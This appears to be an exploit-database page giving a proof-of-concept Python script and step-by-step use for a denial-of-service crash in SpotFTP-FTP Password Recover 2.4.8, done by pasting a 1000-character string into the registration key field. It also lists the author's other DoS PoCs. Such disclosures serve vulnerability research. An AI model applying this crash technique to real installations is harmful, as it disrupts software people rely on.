Author
"Ismael Nava"
Platform
windows
Release date
2020-02-25
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | # Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC) # Date: 2020-24-02 # Exploit Author: Ismael Nava # Vendor Homepage: http://www.nsauditor.com/ # Software Link: http://www.nsauditor.com/spotftp.html # Version: 2.4.8 # Tested on: Windows 10 Home x64 # CVE : n/a #STEPS # Open the program SpotFTP-FTP Password Recover # Run the python exploit script, it will create a new .txt files # Copy the content of the file "RandomLetter.txt" # Click in the Enter Registration Code # In the field Key put the content of the file "RandomLetter.txt" # End :) buffer = 'Z' * 1000 try: file = open("RandomLetter.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready") |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-12-02 | "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" | local | windows | "Ismael Nava" |
2020-02-26 | "Core FTP LE 2.2 - Denial of Service (PoC)" | dos | windows | "Ismael Nava" |
2020-02-25 | "SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)" | dos | windows | "Ismael Nava" |
2020-02-25 | "aSc TimeTables 2020.11.4 - Denial of Service (PoC)" | dos | windows | "Ismael Nava" |
2018-11-12 | "CuteFTP 9.3.0.3 - Denial of Service (PoC)" | dos | windows_x86-64 | "Ismael Nava" |
import requests
response = requests.get('http://127.0.0.1:8181?format=json')
For full documentation follow the link above